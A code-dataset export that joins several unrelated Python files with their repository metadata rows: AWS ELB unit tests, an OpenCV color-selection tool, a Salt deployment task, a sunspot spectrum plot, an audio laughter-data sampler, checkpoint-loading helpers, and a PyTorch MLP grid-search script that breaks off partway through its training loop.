elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTP',
'LoadBalancerPort': 80,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': 'arn:aws:acm::123:blah'
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'])
@mock_elb
def test_get_elb_with_tls(self):
"""Test creation an ELB with TLS"""
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb(tls=True)
elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTPS',
'LoadBalancerPort': 443,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': 'arn:aws:acm::123:blah'
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'],
Scheme='internal')
@mock_elb
def test_get_elb_with_idle_timeout(self):
"""Test creating an ELB with an idle timeout"""
client = self.disco_elb.elb_client
client.modify_load_balancer_attributes = MagicMock(wraps=client.modify_load_balancer_attributes)
self._create_elb(idle_timeout=100)
client.modify_load_balancer_attributes.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
LoadBalancerAttributes={'ConnectionDraining': {'Enabled': False, 'Timeout': 0},
'ConnectionSettings': {'IdleTimeout': 100}}
)
@mock_elb
def test_get_elb_with_connection_draining(self):
"""Test creating ELB with connection draining"""
client = self.disco_elb.elb_client
client.modify_load_balancer_attributes = MagicMock(wraps=client.modify_load_balancer_attributes)
self._create_elb(connection_draining_timeout=100)
client.modify_load_balancer_attributes.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
LoadBalancerAttributes={'ConnectionDraining': {'Enabled': True, 'Timeout': 100}}
)
@mock_elb
def test_delete_elb(self):
"""Test deleting an ELB"""
self._create_elb()
self.disco_elb.delete_elb(TEST_HOSTCLASS)
load_balancers = self.disco_elb.elb_client.describe_load_balancers()['LoadBalancerDescriptions']
self.assertEquals(len(load_balancers), 0)
@mock_elb
def test_get_existing_elb(self):
"""Test get_elb for a hostclass"""
self._create_elb()
self.assertIsNotNone(self.disco_elb.get_elb(TEST_HOSTCLASS))
@mock_elb
def test_list(self):
"""Test getting the list of ELBs"""
self._create_elb(hostclass='mhcbar')
self._create_elb(hostclass='mhcfoo')
self.assertEquals(len(self.disco_elb.list()), 2)
@mock_elb
def test_elb_delete(self):
"""Test deletion of ELBs"""
self._create_elb(hostclass='mhcbar')
self.disco_elb.delete_elb(hostclass='mhcbar')
self.assertEquals(len(self.disco_elb.list()), 0)
@mock_elb
def test_destroy_all_elbs(self):
"""Test deletion of all ELBs"""
self._create_elb(hostclass='mhcbar')
self._create_elb(hostclass='mhcfoo')
self.disco_elb.destroy_all_elbs()
self.assertEquals(len(self.disco_elb.list()), 0)
| 39.33945 | 105 | 0.645872 | 991 | 8,576 | 5.262361 | 0.159435 | 0.042953 | 0.062128 | 0.042953 | 0.644295 | 0.616683 | 0.60441 | 0.553595 | 0.524449 | 0.511793 | 0 | 0.01256 | 0.248018 | 8,576 | 217 | 106 | 39.520737 | 0.796092 | 0.079524 | 0 | 0.546512 | 0 | 0 | 0.121364 | 0.03268 | 0 | 0 | 0 | 0 | 0.093023 | 1 | 0.110465 | false | 0 | 0.023256 | 0.005814 | 0.151163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce9bb2a8ae8eb5792bff17cb6dc037088a6cdd3 | 2,765 | py | Python | colorselect.py | aimuch/CarND-Advanced-Lane-Lines | d955d31e4f8d72b2651dd9ce1e58d5be64e9004f | [
"MIT"
] | 1 | 2020-12-17T11:09:19.000Z | 2020-12-17T11:09:19.000Z | colorselect.py | aimuch/CarND-Advanced-Lane-Lines | d955d31e4f8d72b2651dd9ce1e58d5be64e9004f | [
"MIT"
] | null | null | null | colorselect.py | aimuch/CarND-Advanced-Lane-Lines | d955d31e4f8d72b2651dd9ce1e58d5be64e9004f | [
"MIT"
] | 1 | 2020-12-17T11:09:20.000Z | 2020-12-17T11:09:20.000Z |
# coding: utf-8
import cv2
import numpy as np
import sys
# callback function
def nothing(x):
pass
# import image
inputImageName = 'test_images/test1.jpg'
try:
img = cv2.imread(inputImageName) # BRG
WindowName = 'Color Select V1.0'
cv2.namedWindow(WindowName)
cv2.imshow(WindowName,img)
except Exception as err:
print ('Exception: ', err)
print("Open file %s failed!"%(inputImageName))
sys.exit(-1)
# create trackbars for color change
WindowName_1_L = 'CH 1 Down'
WindowName_1_R = 'CH 1 UP'
WindowName_2_L = 'CH 2 Down'
WindowName_2_R = 'CH 2 UP'
WindowName_3_L = 'CH 3 Down'
WindowName_3_R = 'CH 3 UP'
cv2.createTrackbar(WindowName_1_L,WindowName,0,255,nothing)
cv2.createTrackbar(WindowName_1_R,WindowName,0,255,nothing)
cv2.setTrackbarPos(WindowName_1_L,WindowName,0)
cv2.setTrackbarPos(WindowName_1_R,WindowName,255)
cv2.createTrackbar(WindowName_2_L,WindowName,0,255,nothing)
cv2.createTrackbar(WindowName_2_R,WindowName,0,255,nothing)
cv2.setTrackbarPos(WindowName_2_L,WindowName,0)
cv2.setTrackbarPos(WindowName_2_R,WindowName,255)
cv2.createTrackbar(WindowName_3_L,WindowName,0,255,nothing)
cv2.createTrackbar(WindowName_3_R,WindowName,0,255,nothing)
cv2.setTrackbarPos(WindowName_3_L,WindowName,0)
cv2.setTrackbarPos(WindowName_3_R,WindowName,255)
switch = '0 : RGB \n1 : HSV \n2 : HLS'
cv2.createTrackbar(switch,WindowName,0,2,nothing)
def colorselect(image,ch1,ch1up,ch2,ch2up,ch3,ch3up):
if ch1<ch1up and ch2<ch2up and ch3<ch3up:
mode = cv2.getTrackbarPos(switch,WindowName)
modeDict = {0:cv2.COLOR_BGR2RGB, 1:cv2.COLOR_BGR2HSV, 2:cv2.COLOR_BGR2HLS}
colormode = modeDict[mode]
convertedImage = cv2.cvtColor(image, colormode)
lower_color = np.array([ch1, ch2, ch3])
upper_color = np.array([ch1up, ch2up, ch3up])
color_mask = cv2.inRange(convertedImage, lower_color, upper_color)
dst = cv2.bitwise_and(image, image, mask = color_mask)
return dst
else:
return image
if __name__ == '__main__':
while(True):
# Push ESC exit
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
        # get current positions of the six trackbars
ch1 = cv2.getTrackbarPos(WindowName_1_L,WindowName)
ch1up= cv2.getTrackbarPos(WindowName_1_R,WindowName)
ch2 = cv2.getTrackbarPos(WindowName_2_L,WindowName)
ch2up= cv2.getTrackbarPos(WindowName_2_R,WindowName)
ch3 = cv2.getTrackbarPos(WindowName_3_L,WindowName)
ch3up= cv2.getTrackbarPos(WindowName_3_R,WindowName)
filtedimg = colorselect(img,ch1,ch1up,ch2,ch2up,ch3,ch3up)
# Display the image
cv2.imshow(WindowName,filtedimg)
cv2.destroyAllWindows()
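
# --- Programmatic usage sketch (illustrative). Note that colorselect() reads
# the color-space mode from the 'switch' trackbar, so the window created above
# must still exist; the HSV-style thresholds below are example values only.
#
# filtered = colorselect(img, 15, 35, 80, 255, 100, 255)
# cv2.imwrite('filtered.jpg', filtered)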
| 30.054348 | 82 | 0.713562 | 375 | 2,765 | 5.082667 | 0.293333 | 0.057712 | 0.084995 | 0.066107 | 0.292235 | 0.283841 | 0.15425 | 0.15425 | 0 | 0 | 0 | 0.066225 | 0.180832 | 2,765 | 91 | 83 | 30.384615 | 0.775276 | 0.05859 | 0 | 0 | 0 | 0 | 0.058687 | 0.008108 | 0 | 0 | 0.001544 | 0 | 0 | 1 | 0.032258 | false | 0.016129 | 0.048387 | 0 | 0.112903 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ceab29943b8310e28f9a2de61cf44e20bdc7625 | 1,918 | py | Python | src/deploy/tasks.py | bluesnailstw/flamingos | e13bf4ac4caa5fa50e45d7285877c64218c49723 | [
"Apache-2.0"
] | null | null | null | src/deploy/tasks.py | bluesnailstw/flamingos | e13bf4ac4caa5fa50e45d7285877c64218c49723 | [
"Apache-2.0"
] | null | null | null | src/deploy/tasks.py | bluesnailstw/flamingos | e13bf4ac4caa5fa50e45d7285877c64218c49723 | [
"Apache-2.0"
] | null | null | null | from salt.salt_api import Pepper
from asset.models import Host, HostGroup
from deploy.models import Task, TASK_STATUS, History
from django.conf import settings
from users.models import User
from pillars.models import Vars, Configuration
from redis import StrictRedis
def get_all_hosts(task: Task):
hosts = set()
def travel(node: HostGroup):
if node is None:
return
for host in node.hosts.filter(inventory=task.inventory):
hosts.add(host.host_name)
for child in node.children.all():
travel(child)
if task.target:
travel(task.target)
else:
travel(task.project.host_group)
return list(hosts)
def deploy_async(t_id: int, user: User, self_vars: dict):
task = Task.objects.get(id=t_id)
sls = task.project.sls.replace(settings.SALT_STATE_DIRECTORY, '')
hosts = get_all_hosts(task)
values = {**{value.configure.name: value.value
for value in Vars.objects.filter(inventory=task.inventory)}, **self_vars}
pipe = StrictRedis(host=settings.REDIS_HOST_SERVER,
port=settings.REDIS_HOST_PORT,
db=settings.REDIS_DB).pipeline()
for hostname in hosts:
pipe.delete(hostname)
pipe.hmset(hostname, values)
responses = pipe.execute()
print("sync values to redis for hostname[%s], result: %s" % (hostname, str(responses)))
print("project %s deployed on hosts; %s" % (task.project.name, hosts))
p = Pepper().login()
result = p.local_async(tgt=hosts, fun='state.sls',
arg=[sls], tgt_type='list')
# {'return': [{'jid': '20190301083447106122', 'minions': ['074cda43674f']}]}
task.status = TASK_STATUS[1][0]
job_id = result['return'][0]['jid']
task.barn = result['return'][0]['minions']
task.occupy = job_id
task.operator = user
task.save()
return job_id
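
# --- Resulting Redis layout (illustrative). After deploy_async() runs, every
# target minion hostname maps to one Redis hash whose fields are the
# inventory's variable names (Configuration.name -> Vars.value, merged with
# self_vars). From redis-cli, with a placeholder hostname:
#
#   HGETALL <minion-hostname>
#   1) "<configure-name>"
#   2) "<value>"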
| 36.188679 | 95 | 0.642857 | 250 | 1,918 | 4.828 | 0.388 | 0.039768 | 0.018227 | 0.024855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021769 | 0.233577 | 1,918 | 52 | 96 | 36.884615 | 0.79932 | 0.038582 | 0 | 0 | 0 | 0 | 0.062975 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.152174 | 0 | 0.282609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cecd887cd2d7bcda8c9d8ae4eceae2fd8fa82da | 547 | py | Python | PythonDAdata/3358OS_07_Code/code7/spectrum.py | shijiale0609/Python_Data_Analysis | c18b5ed006c171bbb6fcb6be5f51b2686edc8f7e | [
"MIT"
] | 1 | 2020-02-22T18:55:54.000Z | 2020-02-22T18:55:54.000Z | PythonDAdata/3358OS_07_Code/code7/spectrum.py | shijiale0609/Python_Data_Analysis | c18b5ed006c171bbb6fcb6be5f51b2686edc8f7e | [
"MIT"
] | null | null | null | PythonDAdata/3358OS_07_Code/code7/spectrum.py | shijiale0609/Python_Data_Analysis | c18b5ed006c171bbb6fcb6be5f51b2686edc8f7e | [
"MIT"
] | 1 | 2020-02-22T18:55:57.000Z | 2020-02-22T18:55:57.000Z | import numpy as np
import statsmodels.api as sm
import matplotlib.pyplot as plt
from scipy.fftpack import rfft
from scipy.fftpack import fftshift
data_loader = sm.datasets.sunspots.load_pandas()
sunspots = data_loader.data["SUNACTIVITY"].values
transformed = fftshift(rfft(sunspots))
plt.subplot(311)
plt.plot(sunspots, label="Sunspots")
plt.legend()
plt.subplot(312)
plt.plot(transformed ** 2, label="Power Spectrum")
plt.legend()
plt.subplot(313)
plt.plot(np.angle(transformed), label="Phase Spectrum")
plt.grid(True)
plt.legend()
plt.show()
| 23.782609 | 55 | 0.776965 | 81 | 547 | 5.209877 | 0.481481 | 0.07109 | 0.085308 | 0.104265 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020121 | 0.091408 | 547 | 22 | 56 | 24.863636 | 0.828974 | 0 | 0 | 0.157895 | 0 | 0 | 0.085923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.263158 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ceebb2258c9e0ad6b3d981ef9099fdb41bb09c6 | 4,170 | py | Python | task02/laughter_classification/sspnet_data_sampler.py | rebryk/SPbAU-Speech-Recognition | 8b1993d17d223f507f4e80154823a075e713ee52 | [
"MIT"
] | 1 | 2019-04-22T14:10:46.000Z | 2019-04-22T14:10:46.000Z | task02/laughter_classification/sspnet_data_sampler.py | rebryk/SPbAU-Speech-Recognition | 8b1993d17d223f507f4e80154823a075e713ee52 | [
"MIT"
] | 15 | 2020-01-28T22:25:14.000Z | 2022-03-11T23:24:04.000Z | task02/laughter_classification/sspnet_data_sampler.py | rebryk/SPbAU-Speech-Recognition | 8b1993d17d223f507f4e80154823a075e713ee52 | [
"MIT"
] | 1 | 2019-04-22T14:01:21.000Z | 2019-04-22T14:01:21.000Z | import os
from os.path import join
import numpy as np
import pandas as pd
import scipy.io.wavfile as wav
from laughter_classification.utils import chunks, in_any, interv_to_range, get_sname
from laughter_prediction.sample_audio import sample_wav_by_time, sample_by_frames
class SSPNetDataSampler:
"""
Class for loading and sampling audio data by frames for SSPNet Vocalization Corpus
"""
def __init__(self, corpus_root):
self.sample_rate = 16000
self.duration = 11
self.default_len = self.sample_rate * self.duration
self.data_dir = join(corpus_root, 'data')
labels_path = join(corpus_root, 'labels.txt')
self.labels = self.read_labels(labels_path)
@staticmethod
def read_labels(labels_path):
def_cols = ['Sample', 'original_spk', 'gender', 'original_time']
label_cols = ['{}_{}'.format(name, ind) for ind in range(6) for name in ('type_voc', 'start_voc', 'end_voc')]
def_cols.extend(label_cols)
labels = pd.read_csv(labels_path, names=def_cols, engine='python', skiprows=1)
return labels
@staticmethod
def most(l):
return int(sum(l) > len(l) / 2)
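        # e.g. most([1, 1, 0]) == 1 (majority laughter); most([1, 0, 0]) == 0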
@staticmethod
def _interval_generator(incidents):
for itype, start, end in chunks(incidents, 3):
if itype == 'laughter':
yield start, end
def get_labels_for_file(self, wav_path, frame_sec):
sname = get_sname(wav_path)
sample = self.labels[self.labels.Sample == sname]
incidents = sample.loc[:, 'type_voc_0': 'end_voc_5']
incidents = incidents.dropna(axis=1, how='all')
incidents = incidents.values[0]
rate, audio = wav.read(wav_path)
laughts = self._interval_generator(incidents)
laughts = [interv_to_range(x, len(audio), self.duration) for x in laughts]
laught_along = [1 if in_any(t, laughts) else 0 for t, _ in enumerate(audio)]
frame_size = int(self.sample_rate * frame_sec)
shift = 3 * frame_size // 4
is_laughter = np.array([self.most(la) for la in sample_by_frames(laught_along, frame_size, shift)])
df = pd.DataFrame({'IS_LAUGHTER': is_laughter, 'SNAME': sname})
return df
def df_from_file(self, wav_path, frame_sec):
"""
Returns sampled data by path to audio file
:param wav_path: string, .wav file path
:param frame_sec: int, length of each frame in sec
:return: pandas.DataFrame with sampled audio
"""
data = sample_wav_by_time(wav_path, frame_sec)
labels = self.get_labels_for_file(wav_path, frame_sec)
df = pd.concat([data, labels], axis=1)
return df
def get_valid_wav_paths(self):
for dirpath, dirnames, filenames in os.walk(self.data_dir):
fullpaths = [join(dirpath, fn) for fn in filenames]
return [path for path in fullpaths if len(wav.read(path)[1]) == self.default_len]
def create_sampled_df(self, frame_sec, naudio=None, save_path=None, force_save=False):
"""
Returns sampled data for whole corpus
:param frame_sec: int, length of each frame in sec
:param naudio: int, number of audios to parse, if not defined parses all
:param save_path: string, path to save parsed corpus
        :param force_save: boolean, if you want to overwrite a file with the same name
:return:
"""
fullpaths = self.get_valid_wav_paths()[:naudio]
dataframes = [self.df_from_file(wav_path, frame_sec) for wav_path in fullpaths]
df = pd.concat(dataframes)
colnames = [f'V{i}' for i in range(df.shape[1] - 2)]
colnames.append('IS_LAUGHTER')
colnames.append('SNAME')
df.columns = colnames
if save_path is not None:
if not os.path.isfile(save_path) or force_save:
print(f'Saving dataset to {save_path}')
df.to_csv(save_path, compression='gzip', index=False)
return df
if __name__ == '__main__':
sampler = SSPNetDataSampler('../vocalizationcorpus')
df = sampler.create_sampled_df(frame_sec=1, naudio=2, save_path='dataset')
| 37.567568 | 117 | 0.652518 | 583 | 4,170 | 4.445969 | 0.291595 | 0.030864 | 0.023148 | 0.028935 | 0.061728 | 0.047068 | 0.029321 | 0.029321 | 0.029321 | 0.029321 | 0 | 0.007952 | 0.246043 | 4,170 | 110 | 118 | 37.909091 | 0.816476 | 0.133573 | 0 | 0.085714 | 0 | 0 | 0.063378 | 0.006022 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.1 | 0.014286 | 0.314286 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf06799512c6201d366260a7eba4f0f1f5ed5fa | 3,292 | py | Python | cvpods/checkpoint/utils.py | tonysy/cvpods | e322d7842ca0e34b1ef6237ea6d350633efc793a | [
"Apache-2.0"
] | 758 | 2021-03-11T08:14:26.000Z | 2022-03-31T07:24:13.000Z | cvpods/checkpoint/utils.py | tonysy/cvpods | e322d7842ca0e34b1ef6237ea6d350633efc793a | [
"Apache-2.0"
] | 58 | 2020-12-04T19:47:10.000Z | 2022-03-30T06:52:13.000Z | cvpods/checkpoint/utils.py | tonysy/cvpods | e322d7842ca0e34b1ef6237ea6d350633efc793a | [
"Apache-2.0"
] | 110 | 2021-03-18T01:59:31.000Z | 2022-03-18T21:26:56.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import collections
from collections import defaultdict
from termcolor import colored
def get_missing_parameters_message(keys: list):
"""
Get a logging-friendly message to report parameter names (keys) that are in
the model but not found in a checkpoint.
Args:
keys (list[str]): List of keys that were not found in the checkpoint.
Returns:
str: message.
"""
groups = _group_checkpoint_keys(keys)
msg = "Some model parameters are not in the checkpoint:\n"
msg += "\n".join(
" " + colored(k + _group_to_str(v), "blue") for k, v in groups.items()
)
return msg
def get_unexpected_parameters_message(keys: list):
"""
Get a logging-friendly message to report parameter names (keys) that are in
the checkpoint but not found in the model.
Args:
keys (list[str]): List of keys that were not found in the model.
Returns:
str: message.
"""
groups = _group_checkpoint_keys(keys)
msg = "The checkpoint contains parameters not used by the model:\n"
msg += "\n".join(
" " + colored(k + _group_to_str(v), "magenta")
for k, v in groups.items()
)
return msg
def _strip_prefix_if_present(state_dict: collections.OrderedDict, prefix: str):
"""
Strip the prefix in metadata, if any.
Args:
state_dict (OrderedDict): a state-dict to be loaded to the model.
prefix (str): prefix.
"""
keys = sorted(state_dict.keys())
if not all(len(key) == 0 or key.startswith(prefix) for key in keys):
return
for key in keys:
newkey = key[len(prefix):]
state_dict[newkey] = state_dict.pop(key)
# also strip the prefix in metadata, if any..
try:
metadata = state_dict._metadata
except AttributeError:
pass
else:
for key in list(metadata.keys()):
# for the metadata dict, the key can be:
# '': for the DDP module, which we want to remove.
# 'module': for the actual model.
# 'module.xx.xx': for the rest.
if len(key) == 0:
continue
newkey = key[len(prefix):]
metadata[newkey] = metadata.pop(key)
def _group_checkpoint_keys(keys: list):
"""
Group keys based on common prefixes. A prefix is the string up to the final
"." in each key.
Args:
keys (list[str]): list of parameter names, i.e. keys in the model
checkpoint dict.
Returns:
dict[list]: keys with common prefixes are grouped into lists.
"""
groups = defaultdict(list)
for key in keys:
pos = key.rfind(".")
if pos >= 0:
head, tail = key[:pos], [key[pos + 1:]]
else:
head, tail = key, []
groups[head].extend(tail)
return groups
def _group_to_str(group: list):
"""
Format a group of parameter name suffixes into a loggable string.
Args:
group (list[str]): list of parameter name suffixes.
Returns:
str: formated string.
"""
if len(group) == 0:
return ""
if len(group) == 1:
return "." + group[0]
return ".{" + ", ".join(group) + "}"
| 29.132743 | 79 | 0.600547 | 441 | 3,292 | 4.403628 | 0.287982 | 0.018023 | 0.020597 | 0.026777 | 0.317714 | 0.289907 | 0.279094 | 0.249228 | 0.249228 | 0.167868 | 0 | 0.003438 | 0.293135 | 3,292 | 112 | 80 | 29.392857 | 0.831113 | 0.395504 | 0 | 0.235294 | 0 | 0 | 0.074339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098039 | false | 0.019608 | 0.058824 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf4544311c2e0722d765a266da005b76bf3bdb4 | 11,367 | py | Python | Assignment/Pytorch_improvements/ex2_pytorch_grid_search.py | EgonFerri/Ex2_NN_backpropr | 3b9426bcda279188cf55908090da51845c9c2ca6 | [
"MIT"
] | null | null | null | Assignment/Pytorch_improvements/ex2_pytorch_grid_search.py | EgonFerri/Ex2_NN_backpropr | 3b9426bcda279188cf55908090da51845c9c2ca6 | [
"MIT"
] | null | null | null | Assignment/Pytorch_improvements/ex2_pytorch_grid_search.py | EgonFerri/Ex2_NN_backpropr | 3b9426bcda279188cf55908090da51845c9c2ca6 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
import numpy as np
import pandas as pd
from sklearn.model_selection import ParameterGrid
from tqdm import tqdm_notebook as tqdm
def kaiming_init(m):
    '''Initialize weights (with Kaiming initialization)
    and biases (with 0s)'''
if type(m) == nn.Linear:
torch.nn.init.kaiming_normal_(m.weight, nonlinearity='relu')
m.bias.data.fill_(0.)
def xavier_init(m):
    '''Initialize weights (with Xavier initialization)
    and biases (with 0s)'''
if type(m) == nn.Linear:
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.)
def update_lr(optimizer, lr):
'''Update learning rate'''
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def n_neurons(num_layers):
    '''Given the number of layers, return a list of length num_layers in which
    each element is an integer giving the number of neurons for the hidden
    layer at the corresponding index (widest layers first)'''
    if num_layers < 2:
        raise ValueError('number of layers has to be >= 2')
    neurons = [50]*2
    for i in range(2, num_layers):
        neurons += [50*i]
    if max(neurons) > input_size:
        raise ValueError('number of neurons is higher than input size')
    return sorted(neurons, reverse=True)
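# e.g. n_neurons(4) -> [150, 100, 50, 50]: two base layers of 50 neurons plus
# one layer of 50*i neurons per extra depth step, sorted widest-first.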
#--------------------------------
# Device configuration
#--------------------------------
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device: %s'%device)
#--------------------------------
# Hyper-parameters (fixed)
#--------------------------------
input_size = 32 * 32 * 3
num_classes = 10
num_epochs = 20 # more epochs but stopping rule has been introduced
batch_size = 200
learning_rate = 1e-3
learning_rate_decay = 0.95
reg=0.001
num_training= 49000
num_validation =1000
#-------------------------------------------------
# Load the CIFAR-10 dataset
#-------------------------------------------------
norm_transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
cifar_dataset = torchvision.datasets.CIFAR10(root='datasets/',
train=True,
transform=norm_transform,
download=True)
test_dataset = torchvision.datasets.CIFAR10(root='datasets/',
train=False,
transform=norm_transform
)
#-------------------------------------------------
# Prepare the training and validation splits
#-------------------------------------------------
mask = list(range(num_training))
train_dataset = torch.utils.data.Subset(cifar_dataset, mask)
mask = list(range(num_training, num_training + num_validation))
val_dataset = torch.utils.data.Subset(cifar_dataset, mask)
#-------------------------------------------------
# Data loader
#-------------------------------------------------
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset,
batch_size=batch_size,
shuffle=False)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
#======================================================================================
# Fully connected neural network for Grid Search
#======================================================================================
class MultiLayerPerceptronGridSearch(nn.Module):
def __init__(self, input_size, hidden_layers, num_classes, activation_func, batchn=False, dropout=False):
super(MultiLayerPerceptronGridSearch, self).__init__()
layers = [] # layers list to store a variable number of layers
layers.append(nn.Linear(input_size, hidden_layers[0])) # Input layer
if batchn:
layers.append(nn.BatchNorm1d(num_features=hidden_layers[0])) # Batch Normalization
layers.append(activation_func) # Activation function
if dropout:
layers.append(nn.Dropout(p=0.3)) # Dropout
        # iterate through the hidden layer list to add as many layers as wanted;
        # hidden_layers is a list in which every item is the number of neurons for that layer
        for i in range(1, len(hidden_layers)):
layers.append(nn.Linear(hidden_layers[i-1], hidden_layers[i]))
if batchn:
layers.append(nn.BatchNorm1d(num_features=hidden_layers[i])) # Batch Normalization
layers.append(activation_func) # Activation function
if dropout:
layers.append(nn.Dropout(p=0.3)) # Dropout
layers.append(nn.Linear(hidden_layers[-1], num_classes)) # Output layer
# Enter the layers into nn.Sequential, so the model may "see" them
self.layers = nn.Sequential(*layers)
def forward(self, x):
out = self.layers(x)
return out
#-------------------------------------------------
# Implementation of Grid Search
#-------------------------------------------------
# Seed for reproducibility
torch.manual_seed(2020)
# Possible values of other hyperparameters
hyper_grid = {'num_layers': [2, 3, 4, 5, 10],
'init_&_activation_func' : [(xavier_init, nn.Tanh()), (kaiming_init, nn.ReLU()), (kaiming_init, nn.LeakyReLU())],
'opt': [torch.optim.SGD, torch.optim.Adam],
'batch_norm_layer': [True, False],
'drop_layer': [True, False]}
# Form all possible combiantions
grid = ParameterGrid(hyper_grid)
all_res = []
counter = -1
for hypers in tqdm(grid):
counter += 1
# Hyperparameters combination
num_layers = hypers['num_layers']
# len(hidden_size) == num_layers and each item is the n. of neurons for that layer
hidden_size = n_neurons(num_layers)
init, activation_func = hypers['init_&_activation_func'] # initialiation and activation fuction to be used
opt = hypers['opt'] # optimizer
batch_norm_layer = hypers['batch_norm_layer'] # boolian to insert Batch Nomalization
drop_layer = hypers['drop_layer'] # boolian to insert Dropout
print('\n\n\n\nHyperparameters: num_layers = '+str(num_layers)+', activation_func = '+str(activation_func)+
', batch_norm_layer = '+str(batch_norm_layer)+', drop_layer = '+str(drop_layer))
# Model
model = MultiLayerPerceptronGridSearch(input_size, hidden_size, num_classes, activation_func=activation_func,
batchn=batch_norm_layer, dropout=drop_layer).to(device)
# Weight initialization
model.apply(init)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = opt(model.parameters(), lr=learning_rate, weight_decay=reg)
# Train the model
lr = learning_rate
total_step = len(train_loader)
# To early stop
best_score = None
patience = 5
# To track training accuracy/loss
train_acc = []
train_loss = []
# To track the validation accuracy/loss
val_acc = []
val_loss = []
# To track learning rate
lr_list = []
for epoch in range(num_epochs):
model.train() #set dropout and batch normalization layers to training mode
correct_tr = 0
total_tr = 0
for i, (images, labels) in enumerate(train_loader):
# Move tensors to the configured device
images = images.to(device)
labels = labels.to(device)
# Pass images to the model to compute predicted labels
images = images.view(images.size(0), -1)
pred_labels = model(images)
# Compute the loss using the predicted labels and the actual labels.
loss = criterion(pred_labels, labels)
# Compute gradients and update the model using the optimizer
optimizer.zero_grad()
loss.backward()
optimizer.step()
tr_loss = loss.item()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, tr_loss))
# Train accuracy
predicted = torch.argmax(pred_labels, dim=1)
total_tr += labels.size(0)
correct_tr += (predicted == labels).sum().item()
acc_tr = correct_tr / total_tr
train_acc.append(acc_tr)
train_loss.append(round(tr_loss, 4))
# Code to update the lr
lr *= learning_rate_decay
lr_list.append(lr)
update_lr(optimizer, lr)
with torch.no_grad():
correct = 0
total = 0
model.eval() # set dropout and batch normalization layers to evaluation mode
for images, labels in val_loader:
images = images.to(device)
labels = labels.to(device)
images = images.view(images.size(0), -1)
pred_labels = model(images)
v_loss = criterion(pred_labels, labels) # validation loss
predicted = torch.argmax(pred_labels, dim=1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
acc = correct / total
print('Validation accuracy is: {} %'.format(100 * acc))
# Stopping rule
if best_score is None: # occurs at first epoch
best_score = acc # set a value for best score
count = 0 # count needed to check patience
torch.save(model.state_dict(), str(counter)+'_model.ckpt') # save weights
print('Model saved')
elif best_score > acc + 1e-03: # best accuracy is better than the current accuracy
